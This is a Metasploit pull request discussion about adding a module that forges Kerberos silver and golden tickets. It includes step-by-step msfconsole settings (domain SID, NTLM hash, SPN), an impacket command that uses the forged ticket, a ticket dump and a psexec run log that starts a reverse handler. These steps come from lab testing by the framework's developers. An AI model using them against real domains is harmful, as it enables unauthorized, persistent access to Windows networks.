Add Silver and Golden ticket forging module

[dwelch-r7]

Updates the Kerberos data model to support the encrypted ticket part, this PR is that start of adding full support for silver/golden ticket creation

Next steps will be to add support for encryption on the encrypted part and integrating it with the existing ticket model

Verification

• [ ] Tests pass
• [ ] Start msfconsole
• [ ] Do: use auxiliary/admin/kerberos/forge_kerberos_ticket
• [ ] Do: set DOMAIN DW.LOCAL
• [ ] Do: set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962
• [ ] Do: set NTHASH 88E4D9FABAECF3DEC18DD80905521B29
• [ ] Do: set USER fake_user
• [ ] Do: set SPN MSSqlSvc/dc1.dw.local:1433 (Option only used for silver tickets)
• [ ] Do: silver to generate a silver ticket or golden for a golden ticket
• [ ] Use your ticket which will have been stored as loot with your chosen target
• [ ] Example usage in impacket:

  export KRB5CCNAME=/path/to/ticket
  python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass
  

[github-actions[bot]]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[dwelch-r7]

After generating the golden ticket and inspecting it, it looks like the timestamps are missing.

{:client=>
  {:name_type=>1,
   :count_of_components=>1,
   :realm=>"MSFLAB.LOCAL",
   :components=>["smcintyre"]},
 :server=>
  {:name_type=>1,
   :count_of_components=>1,
   :realm=>"MSFLAB.LOCAL",
   :components=>["smcintyre"]},
 :keyblock=>{:enctype=>23, :data=>"cc121803584567e2"},
 :authtime=>1969-12-31 19:00:00 -0500,
 :starttime=>1969-12-31 19:00:00 -0500,
 :endtime=>1969-12-31 19:00:00 -0500,
 :renew_till=>1969-12-31 19:00:00 -0500,
 :is_skey=>false,
 :ticket_flags=>1356857344,
 :address_count=>0,
 :addresses=>[],
 :authdata_count=>0,
 :authdatas=>[],
 :ticket=>
  "a\x82\x03\xA40\x82\x03\xA0\xA0\x03\x02\x01\x05\xA1\x0E\e\fMSFLAB.LOCAL\xA2!0\x1F\xA0\x03\x02\x01\x01\xA1\x180\x16\e\x06krbtgt\e\fMSFLAB.LOCAL\xA3\x82\x03d0\x82\x03`\xA0\x03\x02\x01\x17\xA1\x03\x02\x01\x02\xA2\x82\x03R\x04\x82\x03N\xA9f\xA9$\xD5$\xFD\xED\xBC\xB4\x03O8<\x14(U\xED\xBD\xC3_f\xE9m\xA5\x96\x18\x8BJ\x03\xF2&\xF4\xE3)m\xD3\xE6\xBER\xCF\"\xE1\x1C\x16f\xCFr\xC5\xBC~nSdgD\xB0O\xBD\xB6\xF9\xC3\xAC2\xF7<\xAA\xC57\x832\x8F\x13\xF0\xAE@\xD0\xC4\xCA\xD5\x80\xAA\x84T\xEBy\xB1\xA3\xD6\x8Cm\xB9\x19\xC0g\xBD\n" +
  ">\xA0~U\xF4\xA6z\xCDG'{\xE1\x1D\x9E\xDE\x9E\xD3\xA7\xDEf\xF7\xE4\xBC\x15r\x9Ae\xD3\xB8_\x18?\xE2\xA8\n" +
  "\xE5+V*\\[\x81\xB1\xE9\xE76\x83\xEBP\x9C\xB9I\x83\x7F\x8A\x8A0\xDF\x11\xBE#1X\x9F\x80\xC0\xA4\x83p\xBF\x01\x87\xE8V\xA8;w\xFD\xB3\xD8x\x14\xD8\xA3\x9B\xB9\xC9\xAE\xB7\x85;;\xCA\xA7\xDFy\x1F\x16'G\x87C\xF3\xB2\xF8_/S\xB0\x16\b\xBBC\x97X\x82(M(\xF0\x9E[x\x12(V\xDF\a\xAF\xC2\xE6\x1F`\x83'4V\xE5\xC5:\xA4\xBEj\xE4\xEF\x19\xAD\xF8\xEC\xE2\xF0\xD2\v\x18\xF6.O(\xED\xB2t??\xAE0@]\xAE \xD3\xD4\x83\x89p!q\xB3B\xC3\xF8\xEB=\t\xBBU\xECL-;\xEA\x04h@\xEC\x97\xBCd\\h\xB1_\x909\x87\xD9\b\xE0U=\xDAt#\xCF,^]\xD0\xF9\xCC\x93i~y\xCBU\xAC\xDE\x19\x1D\xC8\x95\xBF'\xD11A==\xD2K\x0F6#\x83\xBEZn\x8Ab\x8B\xC8\xCAr\xC7\xEE\xA3b\xA2~\xEC\xE1\e]i\xB7\xB0\x9A\x96\x8B\xAA\xBA\xF6\x91S}g&\x84m\x96\\\xBAg\xA7\x9D\xC2\xEDY[}\xD7gS\xAD8\x18\xA4c1\x82\xEF\xF5!\x84\xC5\xBB\xC4\x8B\xCC\xA3\xC9j\x843\xB6\xC8Y\x8A\x17i0d\x02{i'\x94\xC77N\xD0\xCA\xC2\xAD8\xDE'\xA1\xDF\xEA+U\x83if\x0Eg\xF8\xBC8i\x1F\x9E1/*I\x8Ew\xF3\x86\x80\xEEJ\xD4\x9E\xA5\x15\xE9\x19\e,\xFE\xA5\xBD4@\x04\a\x8D\xB6\xD8(\x8F\x15\r\x1D\xC6\x10e\x8F\xADC\xD0`\x99T\xA6\xD4\x96\xC2\xAF\f\xC3K\x8A\xAB\x13\xE0M\x8E\xC8\x88e\xB4\xD28\xA7y\xF4\xD9\b\xD0B\x17\"\x81{\x95\xAE\xA4LI\r\xB4\xF8\xAB\xAA[\xD8\xF7\xE6\xE5\x14\xA1\xAD\x8B\x031\xCE\x95@\xC1\x85C\x89\xD4z\x00h\x13bNG\xAC2\xB1\xAC\xA2lA\x84\x14\x9A\xDB\xA6\xA7\x03\xFD<\xC1\xC55HaTv\x12Y\x9A\x03\x97{\bjb\xC4\xCB\v\x99Q\xB1\t\xAC\xA0\xB6N\xD0\xE3\xDA|b\xC1|e\xCCB=\x14\x1AFW\x98\x9F%\xA9\x01+\x86/\x9A\xC1a\xD37\xA0\xC9\xCD\x88\xB0\xD2\x17&\x93\xB4\x85;w`\xD2\f\xCB4?\xC6\xC8\xB9\xE1$lQm\xD0\xDA\xF1\xA0\n" +
  "\x9DTl\xBB\x86\x85\xB4\x19\x93'p\xE88\x88\xA8\xDE\xCD\xCE\xC9\x9A\x85t\xEB\x91\x9D\xC2\x86\xCB\xBE\xBC\x94\xC3\x9B(\xA4\xB0\x1D\"\xDDS`\xB9\xEC\x94\xF0\xA2L\xE2\x83c\xF6\x0F\xA5\xB5h!S\xD4*|\x90\x86\x11\xDEP\xEC[\xBF\xC6\xC4q\xAF\xB4E!s\t\xC7\xC3N\xBD>\xF9\xBCh\xEF\x83\xBB1.bJ\xFA\xA7>\x91\xB7\x94\xE3\xFD\xCA\xF2_\xE6\xED\xC1:E:s\x13\x8FgS^\xF2\xEB\x98L\n" +
  "\xE4\xC8\xA58\x06\xBF\xD7Sy$Q^[\t\xEC\xEC\xA4\xE1\x19\xEC\x9D\x88\x13\xE7\xD2>\"\xD0\xBBJa'\x17\x9A\xF2=c\xBBvm\x98\x01SZ~^[\xF6p\x9D\xF7g\xCAP\xAC\xA8Q\xC7\x93\xD5\xD4\xB6",
 :second_ticket=>""}

Also given that a golden ticket is a TGT, the server components should be krbtgt/MSFLAB.LOCAL right?

Yup absolutely right on both counts, minor typos easy fix, nice spot

[smcintyre-r7]

Alright so the changes look good to me now, thanks @dwelch-r7 ! I tested both silver and golden tickets are working with impacket. When a golden ticket is used, there's KRB traffic to get the TGS and it works. When the silver ticket is used, it works without any KRB traffic.

The golden ticket does not work with Metasploit because the cache reuse only supports TGS. This is something I should fix, but in a different PR. The silver ticket however does work with metasploit, as confirmed by making one for the CIFS server and then running the psexec module.

@adfoster-r7 are you comfortable with me landing this or do you still have any outstanding concerns?

[adfoster-r7]

Not a blocker; When testing I ran into issue when testing kerberos + smb. My inline creds were ignored and a ccache file was used implicitly - and it wasn't clear how from a user's perspective to make metasploit not do that.

msf6 exploit(windows/smb/psexec) > run smb://Administrator:[email protected] smbauth=kerberos smbrhostname=dc3.adf3.local domaincontrollerrhost=192.168.123.13 smbdomain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[*] 192.168.123.13:445 - 192.168.123.13:88 - Using cached credential for cifs/dc3.adf3.local Administrator
[-] 192.168.123.13:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[*] Exploit completed, but no session was created.

i.e. There was no option to opt out of the default ccache reuse functionality, it also didn't invalidate the ccache file, or fall back to trying others.

[adfoster-r7]

Release Notes

Adds a new auxiliary/admin/kerberos/forge_ticket module for forging silver and golden Kerberos tickets